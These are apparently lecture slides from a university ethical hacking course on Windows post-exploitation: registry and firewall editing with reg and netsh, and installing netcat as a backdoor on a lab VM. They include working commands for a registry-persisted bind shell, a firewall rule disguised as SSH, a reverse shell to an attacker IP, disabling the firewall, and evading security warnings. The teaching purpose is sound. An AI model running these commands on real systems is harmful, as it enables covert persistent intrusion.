INFO3002 Ethical Hacking Principles and Practice

Lecture 9A: Post Exploitation Part 2

School of Computer, Data and Mathematical Sciences

Western Sydney University
1
Where we are:

2: Scanning

1:Reconnaissance 3:Exploitation

4: Post
Exploitation

5: Writing
Report
2
Lecture outline

Installing backdoors often involves changing Windows

Registry and firewall settings, so we talk about these two
topics first, and then move on to backdoor installation.

■ Changing Windows Registry

■ Changing Windows Firewall Settings
■ Installing backdoors

3
Windows Registry Overview
■ A hierarchical database that stores settings for:
▬ The Microsoft Windows operating system
▬ The applications that opt to use the Registry.

■ Containing two basic elements: key and value.

▬ Key: container of values, similar to the concept of
folder in file system.
▬ Value: object that stores one piece of configuration
information, similar to the concept of file in file
system.

Reference: https://en.wikipedia.org/wiki/Windows_Registry

4
Registry Keys
■ Keys are named similar to Windows paths, using
backslashes to indicate levels of hierarchy.
▬ E.g., HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
refers to the subkey "Windows" of the subkey "Microsoft"
of the subkey "Software" of the HKEY_LOCAL_MACHINE root
key

■ Having the following five visible root keys:

▬ HKEY_LOCAL_MACHINE or HKLM
▬ HKEY_CURRENT_CONFIG or HKCC
▬ HKEY_CLASSES_ROOT or HKCR
▬ HKEY_CURRENT_USER or HKCU
▬ HKEY_USERS or HKU

5
Registry Values
■ Values are name and data pairs.
■ Values are referenced by their names.
▬ Each value has a unique name inside its containing key.

■ The data of a value can store arbitrary information and is

associated with a type.
■ There are 12 standard types for data. Below, we only list the
common three:
▬ REG_SZ: A string type.
▬ REG_BINARY: Arbitrary data; can be anything.
▬ REG_DWORD: 32-bit unsigned integer.

6
Notes to Keys and Values
■ The terms used in Windows Registry is confusing, as in
the standard terminology of computer science, e.g., in
associative array (i.e., dictionary), keys refer to the indices
for the associated values.
■ However, in Windows Registry, keys are a concept similar
to folders, and values are a concept similar to objects or
files, with each value itself consisting of a (name, data)
pair.

7
Editing Keys and Values
■ GUI: regedit.exe
■ Command line: reg.exe
▬ Command line is very important, as hackers usually only
get command line access.

■ Reg.exe is easy to learn. To get help, you can type:

▬ REG /?
▬ REG QUERY /?
▬ REG ADD /?
▬ REG DELETE /?

8
Run Command Prompt as Administrator
■ To run Windows
Registry command
lines, you need to
run the Command
Prompt as
Administrator.
■ Click Windows Start
à Programs à
Accessories à
Command Prompt
à Run as
administrator

9
Reg Command Examples
■ Query what's inside a key:
▬ reg query
HKLM\software\microsoft\windows\currentversion\run
▬ This key contains the programs that will be automatically started when
system boots

■ Add a value inside a key

▬ reg add
HKLM\software\microsoft\windows\currentversion\run /v nc
/d "C:\bin\nc.exe -Ldp 22 -e cmd.exe"
▬ NB: Full path must be used for the program to start: C:\bin\nc.exe

■ Delete a value inside a key

▬ reg delete
HKLM\software\microsoft\windows\currentversion\run /v nc

10
Lecture outline
■ Changing Windows Registry
■ Changing Windows Firewall Settings
■ Installing backdoors

11
A note in the beginning
■ A computer typically installs a third-party firewall other
than Windows Firewall.
■ A third-party firewall has command line interface for
configuration as well.
■ By learning how to modify Windows Firewall configuration,
you can apply similar techniques to the configurations of
other firewalls.

12
Windows Firewall Overview
■ Windows Firewall is a built-in component of Microsoft
Windows that provides packet filtering functions.
■ It also has logging functionality that can record connection
information into a log file.

Reference: https://en.wikipedia.org/wiki/Windows_Firewall

13
Profiles in Windows Firewall
■ For each network interface on a computer, Windows
Firewall can apply one of the following three profiles:
▬ Public: assumes that the network is shared with the
World and is the most restrictive profile.
▬ Private (home/work): assumes that the network is
protected from the Internet and allows more inbound
connections than public.
▬ Domain: is the least restrictive. It allows more inbound
connections to enable file sharing, etc.

14
Changing Windows Firewall Settings
■ GUI: Search "Windows Firewall", then run it
■ Command line:
▬ netsh firewall for WinXP
▬ netsh advfirewall for Win7 and later

■ To learn how to use netsh advfirewall, you can do:

▬ netsh advfirewall /?
for general firewall settings
▬ netsh advfirewall firewall /?
For firewall rules

15
Run Command Window as Administrator
■ To run Windows
Firewall command
lines, you need to
run the Command
Prompt as
Administrator.
■ Click Windows Start
à Programs à
Accessories à
Command Prompt
à Run as
administrator

16
Turn on/off firewalls
■ To turn off firewall (this is sometimes needed in post
exploitation, but too aggressive):
▬ netsh advfirewall set allprofiles state off

■ To turn on firewall:
▬ netsh advfirewall set allprofiles state on

■ To show firewall status:

▬ netsh advfirewall show allprofiles

17
Show current firewall rules
■ Get usage: netsh advfirewall firewall show rule ?

18
Show current firewall rules – Examples
■ Show all rules:
▬ netsh advfirewall firewall show rule name=all | more

■ Show a single rule by specifying its name:

▬ netsh advfirewall firewall show rule name="Telnet Server"

19
Add a new firewall rule
■ Get usage: netsh advfirewall firewall add rule ?
▬ NB: An optional argument (inside square brackets) can be
omitted. If omitted, the default is 'any' unless
specified otherwise.

20
Add a new firewall rule – Example
■ Add an inbound rule allowing TCP port 22 traffic with name "SSH"
▬ netsh advfirewall firewall add rule dir=in action=allow
name="SSH" protocol=TCP localport=22

■ To confirm: netsh advfirewall firewall show rule name="SSH"

21
Delete all matching firewall rules
■ Get usage: netsh advfirewall firewall delete rule ?
▬ NB: usually we use the 'name' argument to specify a
single rule for deletion.

22
Delete firewall rules – Example
■ Delete the firewall rule named "SSH"
▬ netsh advfirewall firewall delete rule name="SSH"

■ To confirm: netsh advfirewall firewall show rule name="SSH"

23
Lecture outline
■ Editing Windows Registry
■ Editing Windows Firewall Settings
■ Installing Backdoors

24
Backdoor Overview
■ A backdoor is a secret service that allows hackers to
access a target repeatedly.
■ After hackers have exploited a target, a common activity is
to install a backdoor at the target, such that hackers will
not have to exploit the target again to get access.

25
Methods of installing backdoor
■ There are many methods for installing backdoors:
▬ MSF provides scripts for installing Meterpreter payload
as a backdoor. (However, the success rate is very low.)
▬ Install the netcat program as a backdoor.
▬ Develop your own programs as backdoor.

■ This lecture will talk about the 2nd method above.

Hereafter, we'll assume that we have successfully

obtained a Meterpreter session at the target.

26
Using the netcat program as backdoor
■ Meterpreter payload will be detected by most anti-virus
software as malware, so it is often better to use other
programs as backdoor.
■ 'netcat' can be such a choice.
▬ 'netcat' can bind itself to a shell at the target and
relay the traffic between the shell and the attacker
machine.
o Binding to a shell (e.g., cmd.exe) can be achieved by ‘-e’
option of netcat: nc –e cmd.exe
▬ Thus, 'netcat' can serve as a backdoor.
▬ The detailed steps are given in the coming slides.

27
Remarks for using netcat as backdoor
■ ‘netcat’ is not a good choice either, as many anti-virus
software will quarantine ‘netcat’ as well.
■ Here we simply use it to demo how to use another program
as backdoor.
■ The professional hackers will typically develop their own
backdoors.

28
Steps of installing netcat as backdoor
■ We'll give the steps of installing netcat as backdoor in our
Win7 VM in the ensuing slides.
■ Before carrying out these steps, we need to first obtain a
meterpreter session by exploiting the SMB vuln ms17-010
on Win7.
▬ Refer to Lecture 6 slides on how to achieve this.
▬ The obtained meterpreter session will be under the
account 'NT Authority/System', which gives us the
privilege to install the backdoor.

29
 Step 1. Upload nc.exe to target.
(NB: In the Win7 VMs in school cloud, we have saved ‘nc.exe’ in the
‘C:\bin’ directory for your convenience, so you don’t need to do
anything here.
The step below is for the case that you created your own Win7 VM.)

■ You can use the Meterpreter 'upload' command to upload

nc.exe to the C:\bin folder or any other folder in target.
▬ Meterpreter> upload ./Downloads/nc.exe C:\\bin

Note: You need to use double backslash to represent a single backslash in

the file path for Windows files in Meterpreter.

30
Step 2. Add nc.exe to automatic startup
■ You can achieve this by editing the Windows Registry.
▬ NB: Meterpreter has a different command syntax for 'reg'.

• -L: listening, i.e., running in server mode, and supporting repeated

connections; ‘-l’ only supports one connection.
• -d: running as daemon, i.e., in background.
• -p <port>: the port number to listen to; you should choose a port number
not in use and not suspicious, say, 22. (Also: -Lpd 22 won’t work).
• -e <program>: execute the program and bind to it (i.e., relay the
input/output to/from it). Moreover, full path must be used for the
program: C:\bin\nc.exe

31
Notes on Step 2
■ You can also run 'shell' under Meterpreter to enter a Windows
shell, and then use Windows command to achieve the same
purpose, but the command syntax is slightly different. See below:
▬ reg add HKLM\software\microsoft\windows\currentversion\run /v
nc /d "C:\bin\nc.exe -Ldp 22 -e cmd.exe"

32
Notes on Step 2 (cont'd)
■ You can check whether Step 2 is effective as below.

■ Or by Windows Command:

33
Step 3. Allow netcat in Windows Firewall
■ Run ‘shell’ in Meterpreter to invoke Windows command
prompt.
■ Then:
netsh advfirewall firewall add rule name="SSH" dir=in action=allow
protocol=TCP localport=22

Disguise it as “SSH Service”

34
Notes on Step 3
■ You can check whether Step 3 is effective as follows.

It's there

35
Step 4. Connect to the backdoor
■ Reboot the target machine and log in.
▬ Without logging in, the nc in the registry won't be triggered.
▬ NB: If you login Win7 with 'Admin', you'll get a nc session with 'Admin'
account; if 'Alex', then a nc session with 'Alex' account.

■ Click ‘Run’ to allow

the ‘C:\bin\nc.exe’
program.

36
Step 4. Connect to the backdoor (cntd)
■ If you don’t want this ‘Security Warning’ window to appear,
you should copy the nc.exe to the C:/Windows/System32
folder in a Meterpreter session, and then install
C:/Windows/System32/nc.exe as a backdoor.
■ Windows trusts every application residing in this folder.
■ You can try this refined technique by yourself.

37
Step 4. Connect to the backdoor (cntd)
■ At the attacker machine, run nc in client mode to connect to
Win7 at port 22, and then you'll get a Windows shell:
▬ NB: the command 'whoami' is supported by Windows as
well.

38
Netcat as backdoor: alternative method
■ In the previous method, the firewall setting needs
modification to allow the attacker to connect to the netcat
backdoor.
▬ This is not very stealthy.

■ The alternative method is to run ‘nc’ in client mode as the

backdoor.
▬ This makes ‘nc’ connect to attacker machine, which is
mostly allowed by firewall.

39
Netcat as backdoor: alternative method
(cont’d)
The rough steps for this are as follows:

■ In Kali, run ‘nc’ in server mode at a well-known port. For example,

▬ sudo nc –vlp 22

■ Modify the Windows Registry of the target machine to

automatically run ‘nc’ in client mode after system boots and user
logs in. For example,
▬ reg add HKLM\software\microsoft\windows\currentversion\run
/v nc /d “C:\bin\nc.exe –d –e cmd.exe Your-Kali-IP 22”
▬ Here, '-d' asks nc to run in daemon mode, i.e., background
mode.

You’ll be asked to try this in your lab work.

40
Netcat as backdoor: removing it

■ When a hacker no longer needs a backdoor, he/she can

remove it by executing:
▬ reg delete
HKLM\software\microsoft\windows\currentversion\run /v nc
▬ NB: for 'delete', only including the value name 'nc' is OK.

■ The hacker should also remove the netcat program from the
C:\bin folder. But in our case, please keep the ‘nc’ there for
later experiments.

41
Example Short Answer Question:
■ Explain the following concepts used in Windows Registry:
Key, Value.

42
References
■ Online Tutorial from Offensive Security: Metasploit
Unleashed
▬ https://www.offensive-security.com/metasploit-
unleashed/

■ The web links mentioned in the slides of this lecture

Big reminder:
• Lab 8 will be due next week. Since it is very
long, consisting of tasks for this lecture and
the last lecture, you should have already
started it!
43